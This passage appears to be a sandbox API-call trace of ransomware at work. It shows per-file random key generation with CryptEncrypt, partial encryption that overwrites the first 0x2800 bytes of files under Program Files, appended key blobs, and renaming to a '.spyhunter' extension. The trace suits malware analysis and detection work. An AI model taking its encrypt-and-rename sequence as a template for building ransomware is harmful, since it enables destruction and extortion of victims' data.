lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.663] WriteFile (in: hFile=0x178, lpBuffer=0x2c21098*, nNumberOfBytesToWrite=0x2760, lpNumberOfBytesWritten=0x57fd4c, lpOverlapped=0x0 | out: lpBuffer=0x2c21098*, lpNumberOfBytesWritten=0x57fd4c*=0x2760, lpOverlapped=0x0) returned 1 [0092.664] GetProcessHeap () returned 0x2c0000 [0092.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c21098 | out: hHeap=0x2c0000) returned 1 [0092.664] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.664] WriteFile (in: hFile=0x178, lpBuffer=0x57fd8c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fd4c, lpOverlapped=0x0 | out: lpBuffer=0x57fd8c*, lpNumberOfBytesWritten=0x57fd4c*=0x4, lpOverlapped=0x0) returned 1 [0092.664] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fd4c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57fd4c*=0x30, lpOverlapped=0x0) returned 1 [0092.664] CloseHandle (hObject=0x178) returned 1 [0092.665] GetProcessHeap () returned 0x2c0000 [0092.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3867e8 [0092.666] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll.spyhunter") returned 95 [0092.666] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoinstallerui.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoinstallerui.dll.spyhunter")) returned 1 [0092.666] GetProcessHeap () returned 0x2c0000 [0092.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3867e8 | out: hHeap=0x2c0000) returned 1 [0092.666] GetProcessHeap () returned 0x2c0000 [0092.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.667] GetProcessHeap () returned 0x2c0000 [0092.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3553b0 | out: hHeap=0x2c0000) returned 1 [0092.667] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fd88 | out: pbBuffer=0x57fd88) returned 1 [0092.667] GetProcessHeap () returned 0x2c0000 [0092.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.667] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57fd80*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57fd80*=0x30) returned 1 [0092.667] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHGDTXT.SHX" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\whgdtxt.shx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0092.668] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHGDTXT.SHX") returned 81 [0092.668] StrStrW (lpFirst="WHGDTXT.SHX", lpSrch=".txt") returned 0x0 [0092.668] GetProcessHeap () returned 0x2c0000 [0092.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c21098 [0092.668] ReadFile (in: hFile=0x178, lpBuffer=0x2c21098, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fd44, lpOverlapped=0x0 | out: lpBuffer=0x2c21098*, lpNumberOfBytesRead=0x57fd44*=0x2800, lpOverlapped=0x0) returned 1 [0092.685] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.685] WriteFile (in: hFile=0x178, lpBuffer=0x2c21098*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57fd44, lpOverlapped=0x0 | out: lpBuffer=0x2c21098*, lpNumberOfBytesWritten=0x57fd44*=0x2800, lpOverlapped=0x0) returned 1 [0092.685] GetProcessHeap () returned 0x2c0000 [0092.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c21098 | out: hHeap=0x2c0000) returned 1 [0092.685] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.685] WriteFile (in: hFile=0x178, lpBuffer=0x57fd84*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fd44, lpOverlapped=0x0 | out: lpBuffer=0x57fd84*, lpNumberOfBytesWritten=0x57fd44*=0x4, lpOverlapped=0x0) returned 1 [0092.846] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fd44, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57fd44*=0x30, lpOverlapped=0x0) returned 1 [0092.846] CloseHandle (hObject=0x178) returned 1 [0092.913] GetProcessHeap () returned 0x2c0000 [0092.913] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c21098 [0092.914] wnsprintfW (in: pszDest=0x2c21098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHGDTXT.SHX.spyhunter") returned 91 [0092.914] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHGDTXT.SHX" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\whgdtxt.shx"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHGDTXT.SHX.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\whgdtxt.shx.spyhunter")) returned 1 [0092.916] GetProcessHeap () returned 0x2c0000 [0092.916] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c21098 | out: hHeap=0x2c0000) returned 1 [0092.916] GetProcessHeap () returned 0x2c0000 [0092.916] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.916] GetProcessHeap () returned 0x2c0000 [0092.916] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34ef68 | out: hHeap=0x2c0000) returned 1 [0092.916] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fd88 | out: pbBuffer=0x57fd88) returned 1 [0092.916] GetProcessHeap () returned 0x2c0000 [0092.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.916] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57fd80*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57fd80*=0x30) returned 1 [0092.917] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Title_Page_Ref.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\title_page_ref.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.917] GetProcessHeap () returned 0x2c0000 [0092.917] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.917] GetProcessHeap () returned 0x2c0000 [0092.917] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37e200 | out: hHeap=0x2c0000) returned 1 [0092.917] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fd80 | out: pbBuffer=0x57fd80) returned 1 [0092.917] GetProcessHeap () returned 0x2c0000 [0092.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.918] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57fd78*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57fd78*=0x30) returned 1 [0092.918] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_LOOP_BG_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\scenes_loop_bg_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.918] GetProcessHeap () returned 0x2c0000 [0092.918] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.918] GetProcessHeap () returned 0x2c0000 [0092.918] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346728 | out: hHeap=0x2c0000) returned 1 [0092.918] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fd80 | out: pbBuffer=0x57fd80) returned 1 [0092.918] GetProcessHeap () returned 0x2c0000 [0092.918] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.918] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57fd78*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57fd78*=0x30) returned 1 [0092.918] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_LOOP_BG.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\scenes_loop_bg.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.918] GetProcessHeap () returned 0x2c0000 [0092.918] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.918] GetProcessHeap () returned 0x2c0000 [0092.918] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37e560 | out: hHeap=0x2c0000) returned 1 [0092.918] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fd78 | out: pbBuffer=0x57fd78) returned 1 [0092.918] GetProcessHeap () returned 0x2c0000 [0092.919] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.919] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57fd70*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57fd70*=0x30) returned 1 [0092.919] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_INTRO_BG_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\scenes_intro_bg_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.919] GetProcessHeap () returned 0x2c0000 [0092.919] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.919] GetProcessHeap () returned 0x2c0000 [0092.919] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3780d8 | out: hHeap=0x2c0000) returned 1 [0092.919] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fd78 | out: pbBuffer=0x57fd78) returned 1 [0092.919] GetProcessHeap () returned 0x2c0000 [0092.919] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.919] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57fd70*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57fd70*=0x30) returned 1 [0092.919] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_INTRO_BG.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\scenes_intro_bg.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.920] GetProcessHeap () returned 0x2c0000 [0092.920] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.920] GetProcessHeap () returned 0x2c0000 [0092.920] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346b88 | out: hHeap=0x2c0000) returned 1 [0092.920] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fd70 | out: pbBuffer=0x57fd70) returned 1 [0092.920] GetProcessHeap () returned 0x2c0000 [0092.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.920] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57fd68*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57fd68*=0x30) returned 1 [0092.920] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\rollinghills.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\rollinghills.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.920] GetProcessHeap () returned 0x2c0000 [0092.920] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.920] GetProcessHeap () returned 0x2c0000 [0092.920] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37e3b0 | out: hHeap=0x2c0000) returned 1 [0092.921] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fd70 | out: pbBuffer=0x57fd70) returned 1 [0092.921] GetProcessHeap () returned 0x2c0000 [0092.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.921] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57fd68*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57fd68*=0x30) returned 1 [0092.921] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_notes-txt-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_notes-txt-background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.921] GetProcessHeap () returned 0x2c0000 [0092.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.921] GetProcessHeap () returned 0x2c0000 [0092.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f058 | out: hHeap=0x2c0000) returned 1 [0092.921] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fd68 | out: pbBuffer=0x57fd68) returned 1 [0092.921] GetProcessHeap () returned 0x2c0000 [0092.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.921] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57fd60*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57fd60*=0x30) returned 1 [0092.921] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-ImageMask.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_image-frame-imagemask.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.921] GetProcessHeap () returned 0x2c0000 [0092.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.922] GetProcessHeap () returned 0x2c0000 [0092.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f148 | out: hHeap=0x2c0000) returned 1 [0092.922] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fd68 | out: pbBuffer=0x57fd68) returned 1 [0092.922] GetProcessHeap () returned 0x2c0000 [0092.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.922] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57fd60*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57fd60*=0x30) returned 1 [0092.922] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-border.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_image-frame-border.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.923] GetProcessHeap () returned 0x2c0000 [0092.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.923] GetProcessHeap () returned 0x2c0000 [0092.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34ee78 | out: hHeap=0x2c0000) returned 1 [0092.923] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fd60 | out: pbBuffer=0x57fd60) returned 1 [0092.923] GetProcessHeap () returned 0x2c0000 [0092.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.923] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57fd58*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57fd58*=0x30) returned 1 [0092.923] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_image-frame-backglow.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_image-frame-backglow.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.923] GetProcessHeap () returned 0x2c0000 [0092.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.924] GetProcessHeap () returned 0x2c0000 [0092.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f238 | out: hHeap=0x2c0000) returned 1 [0092.924] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fd60 | out: pbBuffer=0x57fd60) returned 1 [0092.924] GetProcessHeap () returned 0x2c0000 [0092.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.924] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57fd58*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57fd58*=0x30) returned 1 [0092.924] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-shadow.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_frame-shadow.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.924] GetProcessHeap () returned 0x2c0000 [0092.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.924] GetProcessHeap () returned 0x2c0000 [0092.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346aa8 | out: hHeap=0x2c0000) returned 1 [0092.924] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fd58 | out: pbBuffer=0x57fd58) returned 1 [0092.924] GetProcessHeap () returned 0x2c0000 [0092.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.924] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57fd50*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57fd50*=0x30) returned 1 [0092.924] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-imageMask.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_frame-imagemask.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.925] GetProcessHeap () returned 0x2c0000 [0092.925] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.925] GetProcessHeap () returned 0x2c0000 [0092.925] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x377e20 | out: hHeap=0x2c0000) returned 1 [0092.925] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fd58 | out: pbBuffer=0x57fd58) returned 1 [0092.925] GetProcessHeap () returned 0x2c0000 [0092.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.925] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57fd50*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57fd50*=0x30) returned 1 [0092.925] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbcn6.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0092.945] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM") returned 74 [0092.945] StrStrW (lpFirst="VBCN6.CHM", lpSrch=".txt") returned 0x0 [0092.945] GetProcessHeap () returned 0x2c0000 [0092.945] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c21098 [0092.946] ReadFile (in: hFile=0x178, lpBuffer=0x2c21098, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fd14, lpOverlapped=0x0 | out: lpBuffer=0x2c21098*, lpNumberOfBytesRead=0x57fd14*=0x2800, lpOverlapped=0x0) returned 1 [0092.962] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.962] WriteFile (in: hFile=0x178, lpBuffer=0x2c21098*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57fd14, lpOverlapped=0x0 | out: lpBuffer=0x2c21098*, lpNumberOfBytesWritten=0x57fd14*=0x2800, lpOverlapped=0x0) returned 1 [0092.963] GetProcessHeap () returned 0x2c0000 [0092.963] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c21098 | out: hHeap=0x2c0000) returned 1 [0092.964] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.964] WriteFile (in: hFile=0x178, lpBuffer=0x57fd54*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fd14, lpOverlapped=0x0 | out: lpBuffer=0x57fd54*, lpNumberOfBytesWritten=0x57fd14*=0x4, lpOverlapped=0x0) returned 1 [0092.965] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fd14, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57fd14*=0x30, lpOverlapped=0x0) returned 1 [0092.965] CloseHandle (hObject=0x178) returned 1 [0092.966] GetProcessHeap () returned 0x2c0000 [0092.966] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c11050 [0092.967] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM.spyhunter") returned 84 [0092.967] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbcn6.chm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbcn6.chm.spyhunter")) returned 1 [0092.968] GetProcessHeap () returned 0x2c0000 [0092.968] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c11050 | out: hHeap=0x2c0000) returned 1 [0092.968] GetProcessHeap () returned 0x2c0000 [0092.968] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.968] GetProcessHeap () returned 0x2c0000 [0092.968] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3469c8 | out: hHeap=0x2c0000) returned 1 [0092.968] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fd50 | out: pbBuffer=0x57fd50) returned 1 [0092.968] GetProcessHeap () returned 0x2c0000 [0092.968] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.968] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57fd48*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57fd48*=0x30) returned 1 [0092.969] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_photo_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangle_photo_thumbnail.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 